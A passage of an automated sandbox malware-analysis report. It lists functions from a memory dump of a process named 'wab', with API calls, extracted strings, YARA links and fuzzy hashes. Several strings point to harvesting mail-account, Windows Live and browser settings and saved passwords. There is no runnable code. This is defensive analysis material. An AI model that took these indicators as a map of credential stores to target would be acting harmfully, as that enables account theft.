                                                                                                                Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                • _mbscpy.MSVCRT ref: 00409686
                                                                                                                • _mbscpy.MSVCRT ref: 00409696
                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                • out of memory, xrefs: 0042EBEF
                                                                                                                • database %s is already in use, xrefs: 0042E9CE
                                                                                                                • database is already attached, xrefs: 0042EA97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                                                                                                                  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                • memcpy.MSVCRT ref: 00409C97
                                                                                                                • memcpy.MSVCRT ref: 00409CB4
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                • String ID: 0wE$d
                                                                                                                • API String ID: 2915808112-1552800882
                                                                                                                • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                • memset.MSVCRT ref: 0040FA1E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                • API String ID: 945165440-3589380929
                                                                                                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                • _mbscpy.MSVCRT ref: 00403748
                                                                                                                • _mbscpy.MSVCRT ref: 00403758
                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                • _mbscpy.MSVCRT ref: 004037B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                • String ID: %s@gmail.com
                                                                                                                • API String ID: 500647785-4097000612
                                                                                                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$DialogMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2485852401-0
                                                                                                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                • String ID:
                                                                                                                • API String ID: 3642520215-0
                                                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2313361498-0
                                                                                                                • Opcode ID: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                                                                                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                • Opcode Fuzzy Hash: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                                                                                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                                                • String ID:
                                                                                                                • API String ID: 2126104762-0
                                                                                                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 1999381814-0
                                                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                                                • memcpy.MSVCRT ref: 0044972E
                                                                                                                • memcpy.MSVCRT ref: 0044977B
                                                                                                                • memcpy.MSVCRT ref: 004497F6
                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                                                • memcpy.MSVCRT ref: 00449846
                                                                                                                • memcpy.MSVCRT ref: 00449887
                                                                                                                • memcpy.MSVCRT ref: 004498B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm$__aullrem
                                                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                • API String ID: 643879872-978417875
                                                                                                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                                                • String ID: user_pref("
                                                                                                                • API String ID: 765841271-2487180061
                                                                                                                • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                • memset.MSVCRT ref: 004058C3
                                                                                                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                • SetFocus.USER32(?), ref: 00405976
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4281309102-0
